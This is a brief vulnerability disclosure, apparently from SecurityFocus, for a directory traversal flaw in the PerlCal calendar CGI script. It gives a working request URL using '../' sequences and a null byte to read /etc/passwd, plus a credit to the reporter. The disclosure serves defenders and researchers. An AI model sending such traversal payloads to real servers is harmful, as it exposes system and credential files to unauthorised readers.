PerlCal Directory Traversal Vulnerability

http://www.example.com/cgi-bin/cal_make.pl?
p0=../../../../../../../../../../../../etc/passwd%00

This will display the /etc/passwd (if the webserver user has
access to this file).

(courtesy Stan a.k.a. ThePike <stan@whizkunde.org>)


 

Privacy Statement
Copyright 2010, SecurityFocus